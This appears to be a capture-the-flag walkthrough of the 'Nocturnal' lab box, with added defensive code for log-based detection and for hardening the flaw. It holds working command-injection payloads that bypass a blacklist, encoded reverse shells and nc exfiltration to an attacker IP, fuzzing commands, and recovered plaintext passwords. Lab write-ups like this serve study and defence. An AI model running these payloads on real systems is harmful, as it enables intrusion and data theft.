1. Nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| ssh-rsa [RSA key text not preserved]
| 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcnMmaOpYYv5IoOYfwkaYqI9hP6MhgXCT9Cld1XLFLBhT+9SsJEpV6Ecv+d3A1mEOoFL4sbJlvrt2v5VoHcf4M=
| 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIASsDOOb+I4J4vIK5Kz0oHmXjwRJMHNJjXKXKsW0z/dy
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds
Raw packets sent: 65552 (2.884MB) | Rcvd: 65537 (2.621MB)
2. Port 80
http://nocturnal.htb [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[support@nocturnal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.229.19], Title[Welcome to Nocturnal], nginx[1.18.0]
uploads [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 38ms]
backups [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 38ms]
uploads2 [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 40ms]
:: Progress: [87664/87664] :: Job [1/1] :: 1005 req/sec :: Duration: [0:01:30] :: Errors: 0 ::
There is a download endpoint (view.php) that takes a username and a file. The user admin exists, because for other names the page says “user does not exist”, so the username can be fuzzed:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://nocturnal.htb/view.php\?username=FUZZ\&file=lixo.pdf -b PHPSESSID=l8sr22crdivti9qr2hm5sbj1pd -fw 1170
admin and amanda were found!
admin gave nothing
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://nocturnal.htb/view.php\?username=amanda\&file=FUZZ -e .doc,.docx,.dot,.dotx,.rtf,.txt,.odt,.xls,.xlsx,.xlsm,.xlsb,.csv,.ods,.pdf -b PHPSESSID=l8sr22crdivti9qr2hm5sbj1pd -fw 1175,1170
found privacy.odt
found amanda:arHkG7HAI68X8s1J
We now have a valid password.
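From the defender's side, the username fuzzing against view.php above leaves a clear trace in the nginx access log: one client requesting view.php with many distinct username values in a short time. The following is an added example, not part of these notes or the box: it parses constructed nginx combined-format lines, groups username values per client, and flags enumerators and percent-encoded tab/newline characters in request targets. The log lines, the threshold and the function names (parse_line, analyse) are assumptions made for this example.

```python
"""Added example (not part of the notes): spotting view.php username
enumeration in nginx access logs. Log lines below are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# nginx 'combined' format: ip ident user [time] "request" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Percent-encoded tab, LF or CR in a request target: the characters a
# whitespace/separator blacklist tends to forget.
ENCODED_CONTROL = re.compile(r'%0[9aAdD]')

# Constructed sample, same shape as the ffuf run in section 2: one client tries
# many usernames against view.php, another just downloads a file it was given.
SAMPLE_LOG = """\
10.10.14.168 - - [11/May/2025:21:40:01 +0000] "GET /view.php?username=admin&file=lixo.pdf HTTP/1.1" 200 1170 "-" "fuzzer (constructed)"
10.10.14.168 - - [11/May/2025:21:40:01 +0000] "GET /view.php?username=index&file=lixo.pdf HTTP/1.1" 200 1170 "-" "fuzzer (constructed)"
10.10.14.168 - - [11/May/2025:21:40:01 +0000] "GET /view.php?username=login&file=lixo.pdf HTTP/1.1" 200 1170 "-" "fuzzer (constructed)"
10.10.14.168 - - [11/May/2025:21:40:02 +0000] "GET /view.php?username=amanda&file=lixo.pdf HTTP/1.1" 200 1175 "-" "fuzzer (constructed)"
10.10.14.168 - - [11/May/2025:21:40:02 +0000] "GET /view.php?username=test&file=lixo.pdf HTTP/1.1" 200 1170 "-" "fuzzer (constructed)"
10.10.14.168 - - [11/May/2025:21:40:02 +0000] "GET /view.php?username=backup&file=lixo.pdf HTTP/1.1" 200 1170 "-" "fuzzer (constructed)"
10.10.14.168 - - [11/May/2025:21:45:30 +0000] "GET /view.php?username=amanda&file=a%09b HTTP/1.1" 200 1175 "-" "fuzzer (constructed)"
10.10.14.50 - - [11/May/2025:21:41:10 +0000] "GET /view.php?username=amanda&file=privacy.odt HTTP/1.1" 200 14231 "-" "browser (constructed)"
10.10.14.50 - - [11/May/2025:21:41:12 +0000] "GET / HTTP/1.1" 200 1524 "-" "browser (constructed)"
this line is not an access-log record
"""


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyse(log_text: str, enum_threshold: int = 5) -> dict:
    """Group view.php username values per client IP and flag enumeration
    (>= enum_threshold distinct names) plus encoded control characters."""
    usernames_by_ip = defaultdict(set)
    control_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path == "/view.php":
            for name in parse_qs(url.query).get("username", []):
                usernames_by_ip[rec["ip"]].add(name)
        if ENCODED_CONTROL.search(rec["target"]):
            control_hits.append((rec["ip"], rec["target"]))
    enumerators = {ip: sorted(names) for ip, names in usernames_by_ip.items()
                   if len(names) >= enum_threshold}
    return {"enumeration": enumerators, "encoded_control_chars": control_hits}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for ip, names in result["enumeration"].items():
        print(f"{ip} tried {len(names)} usernames on view.php: {', '.join(names)}")
    for ip, target in result["encoded_control_chars"]:
        print(f"{ip} sent encoded control character in {target}")
```

The threshold of five distinct usernames is a starting point; on a real server the count should be taken per time window (the sample compresses it into seconds), and the size column is worth keeping because the enumeration on this box was filtered on response length (the -fw values above), which shows up as many identical-size 200 responses from one client.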
3. admin.php
On my pc: nc -l -p 4444 -q 1 > root.txt </dev/null
The password field is what we control; we can send this:
(cat,../nocturnal_database/nocturnal_database.db)");'
In admin.php the password goes straight into a shell command, guarded only by a blacklist:
$command = "zip -x './backups/*' -r -P " . $password . " backupfile.cenas . > logfile.log 2>&1 &";
$blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];
Tab (%09) and newline (%0A) are not in the blacklist, so they stand in for the space and the command separator in the payloads below:
password%09backupfile.cenas%09.%09%23%0Abase64%09-d<<<"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xNjggNDQ0NCA+L3RtcC9m">"view.php"%09#
password%09backupfile.cenas%09.%09%23%0Abase64%09-d%3C%3C%3C%22cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xNjggNDQ0NCA%2BL3RtcC9m%22%3E%22file.sh%22%09
password%09backupfile.cenas%09.%09%23%0Abash%3C%22./file.sh%22%09%23
password%09backupfile.cenas%09.%09%0Als%3Efile.php%09%23
password%09backupfile.cenas%09.%09%0Acat<'./uploads/privacy.odt'%09%23%09%0A%23
The server then runs (the ls>file.php payload, decoded):
zip -x './backups/*' -r -P password backupfile.cenas .
ls>'file.php' # backupfile.cenas . > logfile.log 2>&1 &"
password%09backupfile.cenas%09.%09%0Abash%3C%3C%3C%22ping%09-c2%0910.10.14.168%22%09%23
password%09backupfile.cenas%09.%09%23%0Abash%3C%3C%3C%22rm%09%2Ftmp%2Ff%3Bmkfifo%09%2Ftmp%2Ff%3Bcat%09%2Ftmp%2Ff%7C%2Fbin%2Fbash%09-i%092%3E%261%7Cnc%0910.10.14.168%094444%09%3E%2Ftmp%2Ff%22%09%23
mypassword archive.zip ./* ; cat ../nocturnal_database/nocturnal_database.db | nc 10.10.14.168 4444;
2>/dev/null\nnc\t10.10.14.168\t4444\t-e\t/bin/bash\n
password%0A%09cat<../nocturnal_database/nocturnal_database.db>mynewfile.db%09#
from the db tobias:slowmotionapocalypse
reusing password o
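The root cause in admin.php is the blacklist approach: it lists shell metacharacters but not tab or newline, and the value is concatenated into a string that /bin/sh parses. The following is an added example, not code from the box or these notes: it re-implements the same pattern in Python to show how many words the shell ends up seeing, and puts the hardened form beside it, an allowlist plus an argument vector that never reaches a shell. The names (BLACKLIST_CHARS, vulnerable_command, safe_argv, child_sees) and the allowlist regex are assumptions made for this example.

```python
"""Added example (not from the page or the box): the admin.php pattern
re-implemented in Python, beside a hardened version."""
import re
import subprocess
import sys

# The blacklist exactly as admin.php shows it. Tab and newline are absent,
# and /bin/sh treats both as word separators (newline also ends a command).
BLACKLIST_CHARS = [';', '&', '|', '$', ' ', '`', '{', '}', '&&']


def blacklist_allows(password: str) -> bool:
    """The page's check: a password passes if none of the substrings occur in it."""
    return not any(bad in password for bad in BLACKLIST_CHARS)


def vulnerable_command(password: str) -> str:
    """The shell string admin.php concatenates (same layout as on the page)."""
    return ("zip -x './backups/*' -r -P " + password
            + " backupfile.cenas . > logfile.log 2>&1 &")


def shell_word_count(password: str) -> int:
    """How many whitespace-separated words the shell sees. A clean password
    yields 12; a tab or newline inside the password adds words, and those
    extra words become options, operands or a new command."""
    return len(vulnerable_command(password).split())


# Hardened: allowlist the characters, bound the length, and never let the
# value reach a shell. The regex is an assumption for this example.
SAFE_PASSWORD = re.compile(r'[A-Za-z0-9._@+=-]{8,64}')


def allowlist_allows(password: str) -> bool:
    """Accept only characters that are inert for every consumer of the value."""
    return SAFE_PASSWORD.fullmatch(password) is not None


def safe_argv(password: str, archive: str = "backupfile.cenas") -> list:
    """Argument vector for subprocess.run(..., shell=False). Each element is one
    argv entry, so whitespace or metacharacters inside `password` cannot split
    it. './backups/*' is passed literally; zip does its own -x pattern matching."""
    if not allowlist_allows(password):
        raise ValueError("password contains characters outside the allowlist")
    return ["zip", "-x", "./backups/*", "-r", "-P", password, archive, "."]


def argv_rejects(password: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        safe_argv(password)
    except ValueError:
        return True
    return False


def child_sees(value: str) -> str:
    """Spawn a child with list-form subprocess (no shell) and return the single
    argv entry it received. The child is the Python interpreter so the demo runs
    offline without zip installed; the argv handling is the same."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    # Constructed value with the same shape as the page's payloads.
    tab_payload = "password\tbackupfile.cenas\t.\t#\nid"
    print("blacklist allows tab/newline payload:", blacklist_allows(tab_payload))
    print("words the shell sees, clean vs payload:",
          shell_word_count("hunter2hunter2"), shell_word_count(tab_payload))
    print("allowlist allows payload:", allowlist_allows(tab_payload))
    print("child receives it as one argv entry:", repr(child_sees(tab_payload)))
```

The PHP equivalent of safe_argv is passing an array rather than a string to proc_open() (supported since PHP 7.4), which skips /bin/sh entirely; where only exec()-style string APIs are available, escapeshellarg() on the value is the fallback, and the allowlist check stays in place in either case.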
4. SSH
tobias:slowmotionapocalypse
There is a service on 8080. Tunneling:
- On my pc ->
ligolo-proxy -selfcert -laddr 10.10.14.168:3333
sudo ip tuntap add user dani mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 240.0.0.1/32 dev ligolo
- On victim -> `./agent -connect 10.10.14.168:3333 -ignore-cert`
5. Forward 8080
ISPConfig is on 8080 and has an admin user.
Reusing the password slowmotionapocalypse works.